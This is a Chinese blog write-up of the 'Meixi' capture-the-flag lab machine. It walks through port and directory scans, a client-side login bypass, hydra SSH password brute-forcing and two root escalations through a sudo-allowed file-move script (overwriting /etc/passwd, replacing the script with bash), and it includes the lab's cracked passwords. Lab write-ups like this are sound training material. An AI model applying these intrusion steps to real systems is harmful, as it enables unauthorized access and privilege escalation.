Meixi靶机复盘

一.信息收集

1.1 端口扫描:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root㉿kali)-[~]
└─# nmap -sV  -A -p- 192.168.209.122
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 23:03 EDT
Nmap scan report for 192.168.209.122
Host is up (0.00053s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Neon User Matrix
MAC Address: 08:00:27:D8:B9:BA (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms 192.168.209.122

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.53 seconds
1.2 目录扫描:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(root㉿kali)-[~]
└─# gobuster dir  -w /usr/share/wordlists/dirb/common.txt  -u http://192.168.209.122/  -x php,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.209.122/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 280]
/.hta.txt             (Status: 403) [Size: 280]
/.hta.zip             (Status: 403) [Size: 280]
/.hta.php             (Status: 403) [Size: 280]
/.hta                 (Status: 403) [Size: 280]
/.htpasswd.php        (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/.htaccess.php        (Status: 403) [Size: 280]
/.htaccess.txt        (Status: 403) [Size: 280]
/.htaccess.zip        (Status: 403) [Size: 280]
/.htaccess            (Status: 403) [Size: 280]
/.htpasswd.txt        (Status: 403) [Size: 280]
/.htpasswd.zip        (Status: 403) [Size: 280]
/index.html           (Status: 200) [Size: 4585]
/login.php            (Status: 200) [Size: 1556]
/pass                 (Status: 200) [Size: 39]
/server-status        (Status: 403) [Size: 280]
Progress: 18456 / 18460 (99.98%)
===============================================================
Finished
==============================================================

/pass 里面是个awk的表达式,后面提权的时候会用到

二. getshell

访问80端口,提供了用户名

访问login.php,使用admin先进行试探,密码是不做校验的(多试几次就知道了)

登录点击不成功(对前端做出了限制),删除disabled即可解除限制

成功获取shell

三.提权:

使用pass的awk的表达式对5000.txt提取密码:

1
2
3
4
5
6
7
8
www-data@Meixi:/var/www/html$ awk -f pass 5000.txt
awk -f pass 5000.txt
cassandra
fuckit
pinkgirl
summertime
www-data@Meixi:/var/www/html$ ls /home
hyh  laoye  qiaojojo  sublarge

使用hydra进行爆破:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[/tmp]
└─# hydra -L user  -P aa -t 4 -I ssh://192.168.209.122
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illel purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-27 22:24:53
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 16 login tries (l:4/p:4), ~4 tries per task
[DATA] attacking ssh://192.168.209.122:22/
[22][ssh] host: 192.168.209.122   login: hyh   password: cassandra
[22][ssh] host: 192.168.209.122   login: laoye   password: fuckit
[22][ssh] host: 192.168.209.122   login: qiaojojo   password: pinkgirl
[22][ssh] host: 192.168.209.122   login: sublarge   password: summertime
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-27 22:25:02

进行ssh登录,发现只有qiaojojo用户能够提权,move.sh用于将一个文件从源路径移动到目标路径

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
qiaojojo@Meixi:~$ sudo -l
Matching Defaults entries for qiaojojo on Meixi:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User qiaojojo may run the following commands on Meixi:
    (ALL) NOPASSWD: /opt/move.sh
    
qiaojojo@Meixi:/opt$ cat move.sh 
#!/bin/bash
if [ $# -ne 2 ]; then
    echo "Error: Incorrect number of arguments" >&2
    exit 1
fi
src_file=$1
dest_path=$2
if [ ! -f "$src_file" ]; then
    echo "Error: Source file does not exist" >&2
    exit 2
fi
mv "$src_file" "$dest_path"
if [ $? -eq 0 ]; then
    echo "File moved successfully: $src_file -> $dest_path"
else
    echo "Unknown error: Failed to move file" >&2
    exit 4
fi

思路:

1.把/etc/passwd中的root密码进行替换,然后使用su root即可连接

2.把bash与move.sh进行替换,让bash有sudo权限,然后sudo bash -p即可

方式一:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
qiaojojo@Meixi:/opt$ sudo -u root /opt/move.sh /tmp/passwd /etc
File moved successfully: /tmp/passwd -> /etc
qiaojojo@Meixi:/opt$ cat etc/passwd
cat: etc/passwd: No such file or directory
qiaojojo@Meixi:/opt$ cd 
qiaojojo@Meixi:~$ cat /etc/passwd | head -3
root:$1$IPae7kgk$c2xLyPT6YfuxVtcOfovtC/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

qiaojojo@Meixi:~$ su - root 
Password: 
root@Meixi:~# ls
root.txt

方式二:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
qiaojojo@Meixi:~$ cp /bin/bash ./ 
qiaojojo@Meixi:~$ ls
bash  user.txt
qiaojojo@Meixi:~$ cd /opt/
qiaojojo@Meixi:/opt$ ;s
-bash: syntax error near unexpected token `;'
qiaojojo@Meixi:/opt$ ls
move.sh
qiaojojo@Meixi:/opt$ cd
qiaojojo@Meixi:~$ ls
bash  user.txt
qiaojojo@Meixi:~$ cp /bin/bash ./ 
qiaojojo@Meixi:~$ ls
bash  user.txt
qiaojojo@Meixi:~$ sudo -u root /opt/move.sh bash /opt/move.sh 
File moved successfully: bash -> /opt/move.sh
qiaojojo@Meixi:~$ ls
user.txt
qiaojojo@Meixi:~$ sudo -u root /opt/move.sh 
root@Meixi:/home/qiaojojo# id
uid=0(root) gid=0(root) groups=0(root)
root@Meixi:/home/qiaojojo#
Maze-sec靶机系列
#复盘
Meixi靶机复盘
http://example.com/2025/05/28/Meixi靶机复盘/
作者
XCDH
发布于
2025年5月28日
许可协议